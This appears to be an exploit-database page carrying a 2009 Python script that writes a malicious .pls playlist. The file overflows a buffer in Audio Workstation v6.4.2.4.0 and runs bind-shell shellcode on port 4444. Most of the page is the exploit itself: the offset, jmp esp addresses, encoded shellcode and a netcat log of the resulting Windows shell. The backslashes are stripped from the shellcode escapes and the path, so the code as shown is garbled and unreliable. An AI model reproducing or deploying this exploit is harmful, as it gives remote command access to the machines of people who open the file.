Audio Workstation v6.4.2.4.0 (.pls) Universal Local BoF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Audio Workstation v6.4.2.4.0 (.pls) Universal Local BoF Exploit
# Published : 2009-12-09
# Author : mr_me
# Previous Title : Easy RM to MP3 Converter 2.7.3.700
# Next Title : BS.Player v2.51 Universal SEH Overflow Exploit

#!/usr/bin/python
##########################################################
#
# Audio Workstation v6.4.2.4.0 (.pls) Universal Local BoF Exploit 
# Credits:  germaya_x
# Coded by: mr_me
# Tested on Windows XP SP3 
# Note: ** For educational purposes only **
# 
###########################################################
#
# mrme@home:~$ nc -v 192.168.0.6 4444
# 192.168.0.6: inverse host lookup failed: Unknown server error : 
# Connection timed out
# (UNKNOWN) [192.168.0.6] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesAudio Workstation>
#
# Note: There is no need to restrict this exploit 
# to XP sp2 as AudioWorkstation.exe contains
# jmp esp addresses that works on XP sp3.
# The addresses that I found using msfpescan:
#
# 0x0105a9b1 jmp esp
# 0x010d1c9a jmp esp
# 0x010f0215 jmp esp
# 0x010f54aa jmp esp
# 0x01102e7e jmp esp

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=thread, LPORT=4444, RHOST=

sc =("x29xc9xb8x47xffxe4x4fxb1x56xddxc3xd9x74x24"
"xf4x5bx31x43x0fx03x43x0fx83xc3x43x1dx11xb3"
"xa3x68xdax4cx33x0bx52xa9x02x19x00xb9x36xad"
"x42xefxbax46x06x04x49x2ax8fx2bxfax81xe9x02"
"xfbx27x36xc8x3fx29xcax13x13x89xf3xdbx66xc8"
"x34x01x88x98xedx4dx3ax0dx99x10x86x2cx4dx1f"
"xb6x56xe8xe0x42xedxf3x30xfax7axbbxa8x71x24"
"x1cxc8x56x36x60x83xd3x8dx12x12x35xdcxdbx24"
"x79xb3xe5x88x74xcdx22x2ex66xb8x58x4cx1bxbb"
"x9ax2exc7x4ex3fx88x8cxe9x9bx28x41x6fx6fx26"
"x2exfbx37x2bxb1x28x4cx57x3axcfx83xd1x78xf4"
"x07xb9xdbx95x1ex67x8axaax41xcfx73x0fx09xe2"
"x60x29x50x6bx45x04x6bx6bxc1x1fx18x59x4exb4"
"xb6xd1x07x12x40x15x32xe2xdexe8xbcx13xf6x2e"
"xe8x43x60x86x90x0fx70x27x45x9fx20x87x35x60"
"x91x67xe5x08xfbx67xdax29x04xa2x6dx6excax96"
"x3ex19x2fx29xd1x85xa6xcfxbbx25xefx58x53x84"
"xd4x50xc4xf7x3excdx5dx60x76x1bx59x8fx87x09"
"xcax3cx2fxdax98x2exf4xfbx9fx7ax5cx75x98xed"
"x16xebx6bx8fx27x26x1bx2cxb5xadxdbx3bxa6x79"
"x8cx6cx18x70x58x81x03x2ax7ex58xd5x15x3ax87"
"x26x9bxc3x4ax12xbfxd3x92x9bxfbx87x4axcax55"
"x71x2dxa4x17x2bxe7x1bxfexbbx7ex50xc1xbdx7e"
"xbdxb7x21xcex68x8ex5exffxfcx06x27x1dx9dxe9"
"xf2xa5xbdx0bxd6xd3x55x92xb3x59x38x25x6ex9d"
"x45xa6x9ax5exb2xb6xefx5bxfex70x1cx16x6fx15"
"x22x85x90x3c")

buff = 'x41' * 1324					# offset
buff += 'xb1xa9x05x01' 				# jmp esp
buff += 'x90' * 10			    		# nops
buff += sc				        		# shellcode
buff += 'xcc' * (4000-1338-len(sc))	# finish buffer

exploitme = open('AudioWorkstation.pls','w')
exploitme.write(buff)
exploitme.close()
print "[+] Created exploit file ;)"